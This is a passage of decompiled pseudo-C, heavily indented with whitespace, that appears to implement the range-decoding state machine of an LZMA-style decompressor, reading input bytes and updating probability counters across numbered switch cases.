                                                                                                                                                                                      								 *(_t613 - 0x88) = 3;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      							_t67 = _t613 - 0x70;
                                                                                                                                                                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      							__eflags =  *_t67;
                                                                                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L23:
                                                                                                                                                                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                      							if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                      								goto L21;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						case 4:
                                                                                                                                                                                      							goto L133;
                                                                                                                                                                                      						case 5:
                                                                                                                                                                                      							goto L137;
                                                                                                                                                                                      						case 6:
                                                                                                                                                                                      							__edx = 0;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      								 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      								 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      								goto L132;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      							__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      							__cl = 8;
                                                                                                                                                                                      							__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                                                                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      							if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      									_t98 = __ebp - 0x38;
                                                                                                                                                                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      									__eflags =  *_t98;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      							if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      								__ebx = 0;
                                                                                                                                                                                      								__ebx = 1;
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__ecx =  *(__ebp - 8);
                                                                                                                                                                                      								__ebx = 0;
                                                                                                                                                                                      								__ebx = 1;
                                                                                                                                                                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      								goto L41;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 7:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      								__eax = 0;
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      								goto L69;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 8:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      								__ecx =  *(__ebp - 4);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 9:
                                                                                                                                                                                      							goto L0;
                                                                                                                                                                                      						case 0xa:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      								goto L132;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      							goto L88;
                                                                                                                                                                                      						case 0xb:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      							L88:
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      							goto L89;
                                                                                                                                                                                      						case 0xc:
                                                                                                                                                                                      							L99:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t334 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t334;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      							goto L101;
                                                                                                                                                                                      						case 0xd:
                                                                                                                                                                                      							L37:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t122 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t122;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L39:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                                                                                      								goto L54;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L41:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      							__eax = __eax + 1;
                                                                                                                                                                                      							__eax = __eax << 8;
                                                                                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								goto L39;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L37;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0xe:
                                                                                                                                                                                      							L46:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t156 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t156;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L48:
                                                                                                                                                                                      								__eflags = __ebx - 0x100;
                                                                                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      								__edx = __ebx + __ebx;
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      								__esi = __edx + __eax;
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      								__ax =  *__esi;
                                                                                                                                                                                      								 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      									__cx = __ax;
                                                                                                                                                                                      									_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      									__ebx = _t170;
                                                                                                                                                                                      									__cx = __ax >> 5;
                                                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                                                      									 *__esi = __ax;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      									0x800 = 0x800 - __edi;
                                                                                                                                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      									__ebx = __ebx + __ebx;
                                                                                                                                                                                      									 *__esi = __cx;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L54:
                                                                                                                                                                                      							_t173 = __ebp - 0x34;
                                                                                                                                                                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      							__eflags =  *_t173;
                                                                                                                                                                                      							goto L55;
                                                                                                                                                                                      						case 0xf:
                                                                                                                                                                                      							L58:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t203 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t203;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L60:
                                                                                                                                                                                      							__eflags = __ebx - 0x100;
                                                                                                                                                                                      							if(__ebx >= 0x100) {
                                                                                                                                                                                      								L55:
                                                                                                                                                                                      								__al =  *(__ebp - 0x44);
                                                                                                                                                                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      								goto L56;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L61:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      							__esi = __edx + __eax;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      								__ebx = _t217;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								goto L60;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L58;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0x10:
                                                                                                                                                                                      							L109:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t365 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t365;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							goto L111;
                                                                                                                                                                                      						case 0x11:
                                                                                                                                                                                      							goto L69;
                                                                                                                                                                                      						case 0x12:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      								goto L132;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      							goto L130;
                                                                                                                                                                                      						case 0x13:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								_t469 = __ebp - 0x58;
                                                                                                                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      								__eflags =  *_t469;
                                                                                                                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      								L144:
                                                                                                                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      								goto L145;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      							L130:
                                                                                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      							goto L144;
                                                                                                                                                                                      						case 0x14:
                                                                                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      							goto L140;
                                                                                                                                                                                      						case 0x15:
                                                                                                                                                                                      							__eax = 0;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							goto L120;
                                                                                                                                                                                      						case 0x16:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      							__eflags = __eax - 4;
                                                                                                                                                                                      							if(__eax >= 4) {
                                                                                                                                                                                      								_push(3);
                                                                                                                                                                                      								_pop(__eax);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      							__eax = __eax << 7;
                                                                                                                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      							goto L145;
                                                                                                                                                                                      						case 0x17:
                                                                                                                                                                                      							L145:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      							goto L149;
                                                                                                                                                                                      						case 0x18:
                                                                                                                                                                                      							L146:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t484 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t484;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L148:
                                                                                                                                                                                      							_t487 = __ebp - 0x48;
                                                                                                                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      							__eflags =  *_t487;
                                                                                                                                                                                      							L149:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      							if( *(__ebp - 0x48) <= 0) {
